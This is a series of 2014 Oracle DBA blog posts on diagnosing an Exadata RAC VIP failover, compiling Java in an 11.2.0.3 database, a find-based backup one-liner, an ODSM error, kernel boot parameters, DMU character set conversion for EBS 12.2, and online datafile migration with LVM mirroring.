Thursday, October 30, 2014

Exadata/RAC -- Investigating TNS-12514/Vip failover/Tns failover/crs_relocate -- a detailed approach

Last week, a TNS-12154 error was reported for one of the Exadata nodes.During the problem hours, as you may guess,  Clients / Apps services could not establish their connections to the back end database server..


A workaround would be to use the second node( by changing the dns) to reach the database, as In Exadata , we have at least 2 db nodes working in the RAC infrastructure.

Using a load balance-or-failover based tns would also help , but the issue was critic and needed to be fixed immediately.

In the problematic environment, EBS 11i was used as an Enterprise ERP application.. Number of Clients, which need to connect to the database was less than 10 and the clients and EBS tecstack were using the Tns entries based on virtual ip addresses of Exadata Database Machine Nodes.
As 11i could not use Scan listener, I was lucky :) This meant a decrease in things to check :)
Note that ; for scan listeners, youc an check the following http://ermanarslan.blogspot.com.tr/2014/02/rac-listener-configuration-in-oracle.html

Okay , I directly jumped in to the first node, because the error TNS-12514 was reported for the connections towards the instance 1. 

Before going further, I want to explain the TNS-12514 /ORA-12514 error typically.

When you this error, you can think that your connection request is transferred to the listener, but the service name or sid that you have provided is not listened by the listener.  In other words, the database service that you want to connect and specified in your connection request is not registered with the listener.
This may be a local_listener parameter problem, or it may be a problem directly caused by the listener process.. Okay. We will see the details in the next paragraph..

So, when I connect to the first node; I saw that listener was running. Actualy, It was normal, because the error was not an "No Listener" error.  So, I directly restarted it.. I wanted to have a clean environment..

While starting the listener , I saw the following in my terminal.

<msg time='2014-10-26T10:54:16.302+02:00' org_id='oracle' comp_id='tnslsnr'
 type='UNKNOWN' level='16' host_id='osrvdb01.somexampleerman.net'
 host_addr='10.10.10.100'>
 <txt>Error listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=exa01-vip)(PORT=1529)(IP=FIRST)))
 </txt>
</msg>
<msg time='2014-10-26T10:54:16.302+02:00' org_id='oracle' comp_id='tnslsnr'
 type='UNKNOWN' level='16' host_id='exa01.blabla.net'
 host_addr='10.10.10.100'>
 <txt>TNS-12545: Connect failed because target host or object does not exist
 TNS-12560: TNS:protocol adapter error
  TNS-00515: Connect failed because target host or object does not exist
   Linux Error: 99: Cannot assign requested address

Okay, the problem was there .. Especially the line ->
Error listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=exa01-vip)

On the other hand this was not the reason behind the problem, it was the result of the problem. 
The real causes were the following lines:
 TNS-00515: Connect failed because target host or object does not exist
   Linux Error: 99: Cannot assign requested address

So , this was the error stack, and as it is a stack,we can understand that the first error was Linux Error 99.

Linux Error 99 which came from the Exadata Compute Node's Operating System (it is Oracle Linux) means ; 

errno.h:
99 EADDRNOTAVAIL Cannot assign requested address
Wow what a surprise! :)

I guess  the Listener uses bind here ->

int bind (int socket, struct sockaddr *addr, socklen_t length)

And , it failed because , the specified address exa01-vip was not available on this database node.

The code could be something like the following;

#include <sys/socket.h>
int rc;
int s;
struct sockaddr_in myname;
memset(&myname, 0, sizeof(myname));
myname.sin_family      = AF_INET;
myname.sin_port        = 1529;
myname.sin_addr.s_addr = inetaddr("192.168.0.91");
rc = bind(s, (struct sockaddr *) &myname, sizeof(myname));  /*virtual ip address of Node1*/ --> I guess at this point, the code should be broken with EADDRNOTAVAIL)

"TNS-00515: Connect failed because target host or object does not exist" was also saying the same think , but in Oracle's Language..

Okay..
After analyzing the above, I used ifconfig command to see whether the vip was there or not..
Yes.. The ifconfig command did not listed the vip..

Then I try to ping the vip .. The ping was okay. The ip was up , but not in its original node (node1 in this case).. So, it was normal to get an error while starting the associated listener ..
When I login to the 2nd node and run ifconfig, I saw that the vip interface of the 1st node is up in the 2nd node.
So my thoughts were true.. The vip of node 1 was not present in 1st node.. On the other hand; it was present in the 2nd node and this was the cause of this problem..

But why and how this vip interface was migrated to 2nd node?

To answer these questions; I first checked the messages of Linux running in Node1, and saw the following;

Oct 26 09:10:33 osrvdb01 kernel: igb: eth2 NIC Link is Down
Oct 26 09:10:33 osrvdb01 kernel: igb: eth1 NIC Link is Down
Oct 26 09:10:33 osrvdb01 kernel: bonding: bondeth0: link status down for idle  interface eth1, disabling it in 5000 ms.
Oct 26 09:10:33 osrvdb01 kernel: bonding: bondeth0: link status down for idle  interface eth2, disabling it in 5000 ms.
Oct 26 09:10:38 osrvdb01 kernel: bonding: bondeth0: link status definitely down for interface eth1, disabling it
Oct 26 09:10:38 osrvdb01 kernel: bonding: bondeth0: link status definitely down for interface eth2, disabling it

So the problem was obvious , there was  a failure with the network links, which were related with the virtual interface..(Note that : the client was made a system operation and changed the switches :) , this was a result of that.. It was not Exadata's fault :))
So Linux in node 1 seems detected and disabled the bondeth0 interface because of this Link errors.
It was normal that disabling bondeth0 made the public ip and virtual ips of Node 1 to become unavailable on node1.. And as a result, they were migrated to 2nd nodes.. (This is Rac :))

Now, we came to a point to know the "thing" that migrated this vip interface from node 1 to node2.

To find this thing, I checked the RAC logs..

In listener log , which was located in Grid Home, listener was saying that "I m no longer listening from exa01-vip) This was true because,  when I first checked the server, I saw the listener was up , but could not listen to the vip address ..

Then I check the crsd.log ;

In crs log, I saw the following;

Received state change for ora.net1.network exadb01 1 [old state = ONLINE, new state = OFFLINE]

So , it seems the crsd understood that the network related to the problematic interface became down..

I saw the restart attempts , too..

CRS-2672: Attempting to start 'ora.net1.network' on 'exadb01'

The attempts were failing..

CRS-2674: Start of 'ora.net1.network' on 'exadb01' failed
quencer for [ora.net1.network exadb01 1] has completed with error: CRS-0215: Could not start resource 'ora.net1.network'.


Then I saw the vip was failed over.. It was migrated from node 1 to node 2 as follows;

2014-10-26 10:21:56.371: [   CRSPE][1178179904] {0:1:578} RI [ora.exadb01.vip 1 1] new external state [INTERMEDIATE] old value: [OFFLINE] on ecadb02 label = [FAILED OVER]
2014-10-26 10:21:56.371: [   CRSPE][1178179904] {0:1:578} Set LAST_SERVER to exadb02 for [ora.exadb01.vip 1 1]
2014-10-26 10:21:56.371: [   CRSPE][1178179904] {0:1:578} Set State Details to [FAILED OVER] from [ ] for [ora.exadb01.vip 1 1]
2014-10-26 10:21:56.371: [   CRSPE][1178179904] {0:1:578} CRS-2676: Start of 'ora.exadb01.vip' on 'exadb02' succeeded

So, te failover was done by the Clusterware...

Okay.. But what was the advantage or benefit of this failover?, This question comes to minds as the clients still were not able to connect to PROD1 even if the corresponding vip was failed over & up on node2.

The purpose of this failover is to make the vip of node1 to be available on node2 . Thus, the connection attempts by the clients towards the node1's listener/vip encounter "Tns no listener" errors without waiting the TIME (TCP TIMEOUT)..

Ofcourse the clients should use a tns that supports this kind of failover; like the following;

PROD =
(DESCRIPTION =
(ADDRESS=(PROTOCOL=TCP)(HOST=exavip1)(PORT=1521))
(ADDRESS=(PROTOCOL=TCP)(HOST=exavip2)(PORT=1521))
(CONNECT_DATA =
(SERVICE_NAME = PROD)
)
)

So by using a tns like above, clients will first go  to the exavip , they will reach the vip and encounter errors immediately.. Then they will go to the second vip and connect to the database.. 
This is te logic of using Vips in Oracle Rac.

Okay. So far so good. We analyzed the problem , found the causes and saw the mechanism that have made the failover.. Now we will see the solution..

The solution I applied was as follows;

[root@exa02 bin]# crs_relocate ora.exadb01.vip
Attempting to stop `ora.exadb01.vip` on member `exadb02`
Stop of `ora.exadb01.vip` on member `exadb02` succeeded.
Attempting to start `ora.exadb01.vip` on member `exadb01`
Start of `ora.exa01.vip` on member `exadb01` succeeded.
Attempting to start `ora.LISTENER.lsnr` on member `exadb01`
Attempting to start `ora.LISTENER_PROD.lsnr` on member `exadb01`
Start of `ora.LISTENER_PROD.lsnr` on member `exadb01` succeeded.

So , I basically used the crs_relocate utility...

Here is the general definition of the crs_relocate utility.

The crs_relocate command relocates applications and application resources as specified by the command options that you use and the entries in your application profile. The specified application or application resource must be registered and running under Oracle Clusterware in the cluster environment before you can relocate it.


That is it.
In this article, we have seen a detailed approach for diagnosing network errors in Exadata (actually in RAC)..
We have seen the Vip failover, and the logic of using Vips in RAC.
Lastly we have seen the crs_relocate utility to migrate the vip to its original location/node.

I hope you will find it useful.. Feel free to comment.

Sunday, October 26, 2014

RDBMS, Java -- Working with the Java inside the Oracle Database

It all started with a Java Source compilation error. The problematic code was a Java Source, which was tried to be compiled inside the Oracle Database..
The code was written to make a web service call remotely using the Oracle Database using Java. The creation script was starting as follows;

CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "BLABLA"
AS import java.io.BufferedReader;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.Reader;
import java.nio.charset.Charset;
import java.sql.Clob;
import java.sql.SQLException;
import javax.xml.soap.MessageFactory;
import javax.xml.soap.MimeHeaders;
import javax.xml.soap.SOAPConnection;
import javax.xml.soap.SOAPConnectionFactory;

import javax.xml.soap.SOAPException;
import javax.xml.soap.SOAPMessage;

public class WebServiceCall {
private static SOAPMessage getSoapMessageFromString(String xml) throws SOAPException, IOException {
MessageFactory factory = MessageFactory.newInstance();
SOAPMessage message = factory.createMessage(new MimeHeaders(), new ByteArrayInputStream(xml.getBytes(Charset.forName("UTF-8"))));
return message;
}

......

And it was continuing, without any syntax errors. It was actually compiled in an 11.2.0.4 Oracle database without any problems, but when it have come compiling it in an 11.2.0.3 Oracle Database , the customer had throubles, which made me writing this post ..

As you may expect, the Java Souce could not be compiled on 11.2.0.3..
The key errors were as follows;

09:54:01 AS import java.io.BufferedReader;
09:54:01 ...
09:54:02 ORA-24344: compilation error
09:56:01 Start Compiling 1 object(s) ...
09:56:01 Executing ALTER JAVA SOURCE blabla COMPILE ...
09:56:02 [0:0] blabla:10: cannot find symbol
09:56:02 [0:0] symbol : class MessageFactory
09:56:02 [0:0] location: package javax.xml.soap
09:56:02 [0:0] import javax.xml.soap.MessageFactory;
09:56:02 [0:0] blabla:11: cannot find symbol
09:56:02 [0:0] symbol : class MimeHeaders
09:56:02 [0:0] location: package javax.xml.soap
09:56:02 [0:0] import javax.xml.soap.MimeHeaders;
09:56:02 [0:0] blabla:12: cannot find symbol
09:56:02 [0:0] symbol : class SOAPConnection
09:56:02 [0:0] location: package javax.xml.soap
..
...
.....

And a lot more ....

Okay, the cause of these errors were the JDK embedded / inside the Oracle Database..  It was clear that some packages could not be found , especially javax.xml.soap..

The developers were thinking that at least Oracle 11.2.0.4 was needed to compile such a Java Source, as it was clear that 11.2.0.3 didnt have the necessary java packages.. That's why an 11.2.0.4 upgrade was requested immediately..
On the other hand; the customer's Dba didnt approve this request because it was only about a single Java object.
At this point , I step in, made the following analysis and  solved the problem without a need to upgrade the entire database.
It was a productive day, which made me do practices in Java.

First of all, there is no document or a whitepaper saying that 11.2.0.4 is needed for compiling these kind of Java Souce objects..
The only statement I could find in Oracle, was  "Release 11.2.0.4 provides an enterprise class platform, Oracle JVM, for developing and deploying server-based Java applications."

So, this could mean that the Entprise Java packages(like soap) in 11.2.0.4 were coming by default.
That seemed to be true, because the Java source was compiling without any errors in 11.2.0.4.
However; we had 11.2.0.3 , so we needed to find a solution in place.

First, checked the component status in the reqisty using the following query;
I was interested to see the Java Virtual Machine Status and Jasva Database Java Packages status.

Select comp_name, status, version
from dba_registry ;

COMP_NAMESTATUSVERSION
OWBVALID11.2.0.3.0
Oracle Application ExpressVALID3.2.1.00.12
Oracle Enterprise ManagerVALID11.2.0.3.0
OLAP CatalogVALID11.2.0.3.0
SpatialVALID11.2.0.3.0
Oracle MultimediaVALID11.2.0.3.0
Oracle XML DatabaseVALID11.2.0.3.0
Oracle TextVALID11.2.0.3.0
Oracle Expression FilterVALID11.2.0.3.0
Oracle Rules ManagerVALID11.2.0.3.0
Oracle Workspace ManagerVALID11.2.0.3.0
Oracle Database Catalog ViewsVALID11.2.0.3.0
Oracle Database Packages and TypesVALID11.2.0.3.0
JServer JAVA Virtual MachineVALID11.2.0.3.0
Oracle XDKVALID11.2.0.3.0
Oracle Database Java PackagesVALID11.2.0.3.0
OLAP Analytic WorkspaceVALID11.2.0.3.0
Oracle OLAP APIVALID11.2.0.3.0
Oracle Real Application ClustersVALID11.2.0.3.0

Everything seemed okay..
Then I checked to see the soap package .. I was interested to see its presence..

select *
from dba_objects
where object_type like '%JAVA%'
and owner = 'SYS'
and object_name like '%soap%'

Okay, the problem was that as expected.. The soap package was missing.. That is, it was not coming in 11.2.0.3 by default.. So it seemed; we had to install/load these kind of missing packages manually using jars...
Okay good, but there were no references for this kind of operations , especially for soap..
Maybe that was the reason that made the Developers think 11.2.0.4 as one an only solution.
Only the following documents were making sense, but they weren't point shots, and unfortuneatly they were for older releases.
How to Load Soap.jar into Oracle Database (Doc ID 344799.1)
They were not answering the question likes which soap package to use; where to download what are the dependencies and etc..

On the other hand; there was a document in Oracle Support for making these kind of web services operations using PL/SQL rahter than Java.
Using UTL_DBWS to Make a Database 11g Callout to a Document Style Web Service (Doc ID 841183.1)

Altough, this document seemed unrelated , it had an excellent reference to a jar file..
In te 4th Step of this  documents; it was saying that : Load the necessary core web services callout jar files into the database. This step is to load the core Java components and is a completely separate action from loading the PL/SQL package as described in the previous steps. This means that the considerations for completing this step are entirely different from the loading of the PL/SQL components.

The load that was mentioned here was by using the dbwsclientws.jar and dbwsclientdb11.jar files.
These jar files were located in te UTL_DBWS utiliy , which can be downloaded from Oracle Support. Download the LATEST copy of the UTL_DBWS utility zip file from the Oracle Technology Network (OTN).  This file, for an 11G database, is named dbws-callout-utility-10131.zip and can be obtained from here. 

By using the following sequence of commands loading of soap package could be done;
cd $ORACLE_HOME/sqlj/lib (replacing $ORACLE_HOME with the proper directory structure)
loadjava -u username/password -r -v -f -s -grant public -genmissing dbwsclientws.jar dbwsclientdb11.jar

The customer loaded those jars; and as expected it seemed loading these jars would bring the soap java package in to the database , and these actions actually did bring the soap java package :)

So far so good. No effort for manual load was needed, but this time another compilation errors were encountered..

14:31:13 Executing ALTER JAVA SOURCE blabla COMPILE ...
14:31:13 [0:0] blabla:21: cannot find symbol
14:31:13 [0:0] symbol : method getBytes(java.nio.charset.Charset)
14:31:13 [0:0] location: class java.lang.String
14:31:13 [0:0] SOAPMessage message = factory.createMessage(new MimeHeaders(), new ByteArrayInputStream(xml.getBytes(Charset.forName("UTF-8"))));
14:31:13 [0:0] ^
14:31:13 [0:0] blabla:31: cannot find symbol
14:31:13 [0:0] symbol : method isEmpty()
14:31:13 [0:0] location: class java.lang.String
14:31:13 [0:0] if(outputParameterText.isEmpty() == false){
14:31:13 [0:0] ^
14:31:13 [0:0] 2 errors
14:31:13 Compilation complete - 11 error(s) found
14:31:13 End Compiling 1 object(s)


This time, the compiler was complaing about the the java.nio.charset.Charset.. It seemed it had no method named forName..

Checked the java package using the following;

select *
from dba_objects
where object_type like '%JAVA%'
and owner = 'SYS'
and object_name like '%java/nio%'

It was there.. Oracle Database 11.2.0.3 had java.nio.charset, so what was the problem?

The problem should be the method "forName" .. I guessed that it was missing because I knew that this method comes with JDK 1.6.. So the jdk in this release may be below 1.6..


According to Oracle Support JDKs or lets say JVMs in Oracle Database were as follows;

Executing the same java stored procedure on Oracle 10.1, 10.2, 11.1, 11.2 and 12.1 databases will show following results for JVM version:

Oracle 10.1 runs java.vm.version=1.4.1
Oracle 10.2 runs java.vm.version=1.4.2
Oracle 11.1 runs java.vm.version=1.5.0_01
Oracle 11.2 runs java.vm.version=1.6.0_43
Oracle 12.1 runs java.vm.version=1.6.0_43 or higher

But , I had doubts about this info, as it might be referring to Oracle Database 11.2.0.4 when saying Oracle 11.2 runs java.vm.version=1.6.0_43 

Then I checked the JDK version of Oracle Database using the following support doc..

How To Determine The JDK Version Used by the Oracle JVM in the Database (Doc ID 131872.1)

The result was as I expected;

The JDK in 11.2.0.4 Oracle Database was 1.6, but the JDK in 11.2.0.3 Oracle Database was 1.5...

So this error was normal ..

The idea to upgrade JDK, which resided in Oracle Database 1.5 to 1.6 seemed utopic, and it was also not supported.

Thus, I had to find another solution in place. 

In this manner; I suggested to change a line in the problematic java source script as follows;
I recommended to use UTF8 directly..  Sourcing a script would do the job..


java.lang
Class String
getBytespublic byte[] getBytes( String charsetName) throws UnsupportedEncodingException
Encodes this String into a sequence of bytes using the named charset, storing the result into a new byte array.

The behavior of this method when this string cannot be encoded in the given charset is unspecified. The CharsetEncoder class should be used when more control over the encoding process is required.

Parameters:charsetName - the name of a supported charsetReturns:The resultant byte arrayThrows:UnsupportedEncodingException - If the named charset is not supportedSince:JDK1.1

Modify this line;
....................ByteArrayInputStream(xml.getBytesCharset.forName("UTF-8")));

To be like the following;

.....................................ByteArrayInputStream(xml.getBytes("UTF8")));


This was the needed action to compile this Java Source with a 1.5 JDK, and this action solved the remaining compilation problems.. It saved the day :)


In this incident; I realized that again..I realized that being a Senior/Principle Oracle Dba/Apps Dba consultant, requires we to have a good developer perspective, too..
No need to say that; using Oracle Support efficiently is a must for being successful.
One last thing about the dependency in Oracle Database; upgrading the Jdk seems unsupported.
Alternatively, you can use OS tier to develop your Java code if it satisfies your needs.. You can have several Jdks in Os tier and you can upgrade them if needed..
One other alternative is to use PLSQL for web service operations, like mentioned in the following doc:
Using UTL_DBWS to Make a Database 11g Callout to a Document Style Web Service (Doc ID 841183.1) .. UTL_DBWS will make you use java indirectly :)

Okay that 's all for now.. Hope you 'll find this useful.

Thursday, October 23, 2014

Linux bash-- primitive Incremental backup script

Following is a little script that can take incremental backups in a way.. It might come handy.

 find SOURCE_DIR -type f -mtime -2 -exec cp -rfp --parents {} TARGET_DIR\;

What this script does is;

it finds the files modified at least 2 days ago, and copies this files to the backup location with the same directory structure..

An example:

[root@ermanhost/]# tree /test2
/test2   --> Backup location.

0 directories, 0 files --> empty.

[root@ermanhost /]# tree /test
/test --> Our Source directory ,which has sub directories and files in it.
`-- dir1
    |-- dir2
    |   |-- dir3
    |   |   `-- testfile1
    |   `-- testfile2
    `-- testfile3

3 directories, 3 files
[root@ermanhost /]# find /test -type f -mtime -2 -exec cp -rfp --parents {} /test2/ \;
[root@tegvoracle /]# tree /test2
/test2  --> That's it. Our Backup is taken with the same directory structure as you see below
`-- test
    `-- dir1
        |-- dir2
        |   |-- dir3
        |   |   `-- testfile1
        |   `-- testfile2
        `-- testfile3

4 directories, 3 files

To test further, I can add a new file and run the script again..

[root@ermanhost /]# touch /test/dir1/testfile4
[root@ermanhost /]# find /test -type f -mtime -2 -exec cp -rfp --parents {} /test2/ \;
[root@ermanhost /]# tree /test2
/test2
`-- test
    `-- dir1
        |-- dir2
        |   |-- dir3
        |   |   `-- testfile1
        |   `-- testfile2
        |-- testfile3
        `-- testfile4  -->Here, the new file is copied with the same directory structure as it source..

Monday, October 20, 2014

OID 11g-- Analysis , http-500 internal server error in ODSM, http://hostname:port/odsm

In one of our customer 's OID environment which was integrated to EBS and SSO, the clients were encountering HTTP-500 Internal Server Error while trying to reach Oracle Directory Services Manager(ODSM) url..


The problematic url was used for managing the OID configuration , like checking the attributes etc.
The error was reported as follows;

OID system is working properly , but we cant open its management interface to control the configuration or its attributes.. In the past, when we see the error, we were just refreshing the web page and were able to continue our work, but nowadays refreshing the webpage does not fix the problem anymore..
Also, when we restart the OID services, the problem dissapears for a while.. On the otherhand, this is not an applicable solution for us.. In Oracle Support, it is said that the error may be related wit Browser Certifications, but in our case it is not relevant.

Okay..  
When I check Oracle Support , I saw that one of the workaround was restarting the managed server ..
Case 3 in the document "CheckList For OID 11g ODSM Page Launching / Loading / Displaying 
Problems Or Errors (Doc ID 972416.1)" was mentioning the restart as a workaround..
But this workaround could not be applied as a solution in this case, because the error was encountring periodically and repeatedly.

So , I requested the OID 's Managed Server log for analysis.
The managed server name was wls_ods1 ,which was a default one ...
After setting the domain environment; the log file could be reached by the following directory path;
$MW_HOME/user_projects/domains/domain_name/servers/server_name/logs

Analyzing the log file of a Weblogic server is like debugging a java program to me.
I have basically, searched for the word Exception that led me to the following..

<[ServletContext@1709139423[app:odsm module:/odsm path:/odsm spec-version:2.5 version:11.1.1.2.0]] Servlet failed with Exception
java.lang.RuntimeException: java.lang.Exception: MDSLockedSessionManager already registered. Can't register more than one.
.....
.....
Caused By: java.lang.Exception: MDSLockedSessionManager already registered. Can't register more than one.
at oracle.adf.share.mds.MDSTransManager.registerMDSLockedSessionManagerInst(MDSTransManager.java:132)
at oracle.adf.share.mds.MDSTransManager.registerMDSLockedSessionManager(MDSTransManager.java:124)

So it was obvious that the Exception "java.lang.RuntimeException: java.lang.Exception: MDSLockedSessionManager already registered. Can't register more than one"  was the cause that I was looking for.. Because the error was saying that Servlet was failed , and the path was the reflecting the odsm.

After finding the low level cause of the problem, I jumped in to the Oracle Support, and found the following document : Accessing ODSM 11g 11.1.1.7 Intermittently Fails with: java.lang.Exception: MDSLockedSessionManager already registered. Can't register more than one. (Doc ID 1586149.1)

Finally, this document brought me to the following bug : bug 17997221
To get the patch for this bug , the customer needed to open an SR to the Oracle Support.
It is planned that; once obtained, the patch was going be applied to the ORACLE_COMMON home of OID .. 
This Oracle home was hosting the binary,library and JRF files which are used for controlling the Fusion..

I will write the conclusion of this story when the patch will be applied, but I m sure that this action plan will fix the problem.

Linux -- list current boot parameters

You may need to list the current boot parameters while your Linux system is running.. There parameters are boot arguments.. When the kernel is booted directly by the BIOS , you can be sure that no additional/unexpected arguments are given on the fly, but when the kernel is booted by using a boot loader such as Grub, additional arguments can be supplied on the fly, and this may cause you some problems with your enterprise applications.

Lets take a look at the boot arguments;

The Linux kernel accepts certain 'command-line options' or 'boot time parameters' at the moment it is started. In general this is used to supply the kernel with information about hardware parameters that the kernel would not be able to determine on its own, or to avoid/override the values that the kernel would otherwise detect.

Any arguments not recognized by the system/not picked up by kernel is treated as an Environment variable decleration, such as 'TERM=vt100.. Some arguments which are not picked up by kernel and also not recoqnized as an environment variable , are passed to the init process. Argument 'Single' is a good example of this type..

Following is an example of edition kernel boot parameters before the boot operation using Grub boot loader.. You see that the string single added to the end of the kernel line.. This arguments instructs it to boot the computer in single user mode, and not launch all the usual daemons.


You can get the full list of these parameters using the following link;
http://man7.org/linux/man-pages/man7/bootparam.7.html

Okay we have seen the boot arguments/parameters so far, lets see how to get the list of current boot parameters of a running  Linux Operating system;

Usually bootloader passes the boot parameters to the kernel command line, which is an in-memory buffer.
We can reach the kernel command line using /proc filesystem, and following is the command we are looking for :)
cat /proc/cmdline

/proc/[pid]/cmdline is a read-only file holds the complete command line for the process, unless the process is a zombie. In the latter case, there is nothing in this file: that is, a read on this file will return 0 characters. The command-line arguments appear in this file as a set of strings separated by null bytes ('\0'), with a further null byte after the last string.
Example:
cat /proc/cmdline 
OUTPUT:
ro root=/dev/VolGroup00/LogVol00 rhgb quiet

As you see by looking to the example output above; the system in this example was booted using ro,root,rhgb and quiet arguments..
So we can understand that the kernel is mounted read only(ro), the root is located in LogVol00(root),  the boot operation was done using redhat graphical boot, which is a GUI tool with booting screen(rhgb) and lastly the boot messages before the rhgb were hidden during the boot operation ..(quiet)

Friday, October 17, 2014

EBS 12.2-- DMU, character set migration, required for "EBS 12.2 VM templates"

It is not so easy to find databases with ASCII characterset in these days, at least in Europe we usually create our databases with UTF8 characterset..
Also, when we talk about Turkey, I can say that we at least use WEISO8859P9 , which support turkish characters..

Meanwhile, the characterset that we need is not the only thing affecting our decision to choose a characterset.. 
Nowadays, the new releases of the applications such as Hyperion require us to have a database with at least a UTF8 characterset. 

Even so, as you may expect ; there are still some databases which come with ASCII character set by default..

The database bundled with EBS 12.2 template of Oracle is a good example for these kind of databases.
 It comes with a ASCII database, and that 's why it is impossible to apply an NLS Language patch on top of its application tier. In other words, it is not possible to make it support multi languages.(such as American and Turkish)

In the past, I remember that converting a characterset from one to another, was a big deal.. ( if the target is not a subset of the source)

Nowadays, fortuneatly, we use stable tools to convert our databases from ASCII to UTF8, AL32UTF8 etc... automatically, as you will see in the real example below..

Okay...We have done this conversion already 2 times for EBS 12.2, and I can say that it works..

So, If you have a virtualized Oracle environment ( like a virutalized ODA X4 our any hardware that runs Oracle VM Server ) , importing Oracle EBS 12.2 templates is a good way to deploy EBS 12.2..
You may find a real life EBS 12.2 template installation example in the following link:
http://ermanarslan.blogspot.com.tr/2014/05/ovm-oracle-vm-server-328-installation.html

 It is fast and it requires less effort but you have got to consider converting the character set, too..

In the following example , we ll convert an ASCII EBS 12.2.3 database to AL32UTF8.
We do this operation using Oracle Database Migration Assistant for Unicode (DMU) as follows...

http://www.oracle.com/technetwork/database/database-technologies/globalization/dmu/learnmore/start-334681.html

First, we install the required PL/SQL package in the database:

start an SQL*Plus session in the Oracle Home of your database,
log in with SYSDBA credentials, and run the script prvtdumi.plb as follows;

$ sqlplus / as sysdba
SQL*Plus: Release 11.2.0.2.0 Production
Copyright (c) 1982, 2010, Oracle. All rights reserved.
Connected to:Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 -ProductionWith the Partitioning, Oracle Label Security, OLAP, Data Miningand Real Application Testing options
SQL>@?/rdbms/admin/prvtdumi.plb
Library created.
Package created.
No errors.
Package body created.
No errors.

Then download and install JDK6 : Note that, there is no need to install jdk, just set db environment and run dmu.

Next, download and install the DMU software:

The DMU is available from its OTN download page. It is also available from My Oracle Support (MOS) asPatch #18392374

To install the DMU, extract the downloaded archive into any target folder/directory using an un-ZIP utility for your platform.

Then, Start the tool:

$ chmod u+x dmu.sh

$ ./dmu.sh

Create a database connection:



Install the DMU repository:

If you connect to a database for the first time, the DMU automatically prompts you to install the repository. If you are not prompted to install the repository, you can install it by right-clicking the database you want to use, and selectingConfigureDMURepository. You can also selectConfigureDMURepositoryfrom the Migration menu. In all of these cases, the Repository Configuration Wizard appears.



To install the Migration Repository:

On the first page of the wizard, the only choice available is Install the repository in migration mode. After selecting this, clickNext. After you clickNext, the second page of the Repository Configuration Wizard is shown.




Here, you select the target character set for the migration. You can choose AL32UTF8



On the third page, you can select the tablespace in which you want to install the repository.

Click finish to install the repository.

Now, you are ready to begin the migration process to Unicode, as described in the DMU documentation. You will scan the database to identify convertibility issues, cleanse the database from these issues, and run the actual conversion step.


Start the migration process

Scanning :





In the scan phase, it may report invalid representation for the rows that have territory='KR' in XDO.XDO_TRANS_UNIT_VALUES table.

We update these rows as follows;

Update XDO.XDO_TRANS_UNIT_VALUES set value='CORRUPTED' where territory='KR'

After these update, it may report errors again.. This time for 4 rows...

For fixing these rows, we can use the editior.. 
When we click on the problematic rows, the tool displays the problematic characters painted in red. We delete these characters and start a new scan.

Note that: You can not convert your characterset without correcting theses errors.

At the last step, we start the convert operation, and we are done.

Important: If you need to convert the Application Tier's characterset , you need to follows appendix A in the document below(Doc ID 393861.1)... On the other hand, this step is not required if you import an EBS 12.2 template.. 
The apps Tier of EBS 12.2 template already comes with an Apps Tier , which has UTF8 characterset.


R12.0 / R12.1 : Globalization Guide for Oracle Applications Release 12 (Doc ID 393861.1)

Tuesday, October 14, 2014

Linux/LVM -- Online Migration of Oracle Database

Using LVM migration techniques, it is possible to migrate an Oracle Database online..
Probably, Oracle will not support this, and I dont know who to blame if it fails.
But I made the test, and there an 11gR2 database was migrated while the sessions were active and no errors or warnings have appeared in the alert log.

The approach is based on the  lvconvert command..
So what we do actually is, create a copy/mirror in the same VG , syncronize the mirror and detach the old disk when they are syncronized.
Thus , the newly mirrored disk become our new active disk, and our files become migrated to the new disk.

Mirrored Logical Volume

Note that, LVM keeps track of the regions that are in sync with a mirror logş. This log can be stored on a seperate disk or it can be stored in memory. In the example below, we will store it in memory.

lvconvert - convert a logical volume from linear to mirror or snapshot



-m--mirrors Mirrors
Specifies the degree of the mirror you wish to create. For example, "-m 1" would convert the original logical volume to a mirror volume with 2-sides; that is, a linear volume plus one copy.


Here is an example ;

[root@localhost ~]# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/VolGroup-lv_root 18G 14G 3.0G 82% /
tmpfs 2.0G 560K 2.0G 1% /dev/shm
/dev/sda1 239M 54M 172M 24% /boot
/dev/mapper/vgu02-lvu02 12G 4.0G 7.2G 36% /u02  --> our disk that contains the datafiles



[root@localhost ~]# ps -ef |grep pmon
oracle 3979 1 0 10:11 ? 00:00:00 ora_pmon_ermantest -> Oracle instance is running

SQL> select name from v$datafile;
NAME
--------------------------------------------------------------------------------
/u02/erman/ermantest/system01.dbf
/u02/erman/ermantest/sysaux01.dbf
/u02/erman/ermantest/undotbs01.dbf
/u02/erman/ermantest/users01.dbf
/u02/erman/ermantest/example01.dbf

--> The database files are on the LVM


SQL> select name from v$controlfile;
NAME
--------------------------------------------------------------------------------
/u02/erman/ermantest/control01.ctl

--> The control file is on the LVM


fdisk -l
-----------------------------
Disk /dev/sdc: 12.9 GB, 12884901888 bytes --> this is our newly added disk, we will migrate our db to this disk.
128 heads, 33 sectors/track, 5957 cylinders
Units = cylinders of 4224 * 512 = 2162688 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x23bdf117

[root@localhost ~]# lvs

LV VG Attr LSize Pool Origin Data% Move Log Cpy%Sync Convert
lv_root VolGroup -wi-ao---- 17.51g
lv_swap VolGroup -wi-ao---- 2.00g
lvu02 vgu02 -wi-ao---- 12.00g  --> our source LVM

[root@localhost ~]# pvs
PV VG Fmt Attr PSize PFree
/dev/sda2 VolGroup lvm2 a-- 19.51g 0
/dev/sdb1 vgu02 lvm2 a-- 12.00g 0  --> our source physical volume


Here we start >

[root@localhost ~]# pvcreate /dev/sdc1
Physical volume "/dev/sdc1" successfully created

[root@localhost ~]# pvs
PV VG Fmt Attr PSize PFree
/dev/sda2 VolGroup lvm2 a-- 19.51g 0
/dev/sdb1 vgu02 lvm2 a-- 12.00g 0
/dev/sdc1 lvm2 a-- 12.00g 12.00g

[root@localhost ~]# vgextend vgu02 /dev/sdc1
Volume group "vgu02" successfully extended

[root@localhost ~]# vgs
VG #PV #LV #SN Attr VSize VFree
VolGroup 1 2 0 wz--n- 19.51g 0
